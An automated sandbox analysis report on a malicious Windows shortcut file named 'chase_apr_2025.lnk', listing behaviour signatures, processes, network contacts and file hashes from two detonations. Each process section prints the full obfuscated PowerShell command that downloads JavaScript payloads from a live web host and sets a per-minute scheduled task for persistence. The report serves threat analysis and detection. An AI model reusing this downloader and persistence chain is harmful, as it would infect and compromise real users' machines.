Malware Analysis Report

2025-05-05 23:31

Sample ID 250418-wd4tystls6
Target chase_apr_2025.lnk
SHA256 09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43

Threat Level: Likely malicious

The file chase_apr_2025.lnk was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-18 17:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-18 17:49

Reported

2025-04-18 17:50

Platform

win10v2004-20250410-en

Max time kernel

41s

Max time network

40s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2645532622-3298555945-705856666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | rietiholidays.it | udp
IT | 185.81.1.167:443 | rietiholidays.it | tcp
US | 8.8.8.8:53 | www.rietiholidays.it | udp
IT | 185.81.1.167:443 | www.rietiholidays.it | tcp
IT | 185.81.1.167:443 | www.rietiholidays.it | tcp
US | 8.8.8.8:53 | r10.o.lencr.org | udp
GB | 2.22.144.149:80 | r10.o.lencr.org | tcp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp

Files

memory/4204-2-0x00007FFB4BFC3000-0x00007FFB4BFC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pk4kxzrp.xao.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4204-12-0x000002257AC20000-0x000002257AC42000-memory.dmp

memory/4204-13-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

memory/4204-14-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

memory/4204-15-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

C:\ProgramData\zqd1lm17ezgl

MD5 6f2c98b320a97239e18b95658d60ac75
SHA1 19b01f664642846c84e02cf0c07a61d4bf8785cd
SHA256 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166
SHA512 c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500

memory/4204-20-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-18 17:49

Reported

2025-04-18 17:50

Platform

win11-20250410-en

Max time kernel

36s

Max time network

4s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | rietiholidays.it | udp
IT | 185.81.1.167:443 | www.rietiholidays.it | tcp
IT | 185.81.1.167:443 | www.rietiholidays.it | tcp
IT | 185.81.1.167:443 | www.rietiholidays.it | tcp
GB | 2.22.144.142:80 | r10.o.lencr.org | tcp
N/A | 127.0.0.1:59468 | | tcp

Files

memory/2168-2-0x00007FF8A8853000-0x00007FF8A8855000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0bguvcx.nlb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-11-0x0000025352440000-0x0000025352462000-memory.dmp

memory/2168-12-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

memory/2168-13-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

memory/2168-14-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

C:\ProgramData\zqd1lm17ezgl

MD5 6f2c98b320a97239e18b95658d60ac75
SHA1 19b01f664642846c84e02cf0c07a61d4bf8785cd
SHA256 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166
SHA512 c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500

memory/2168-19-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp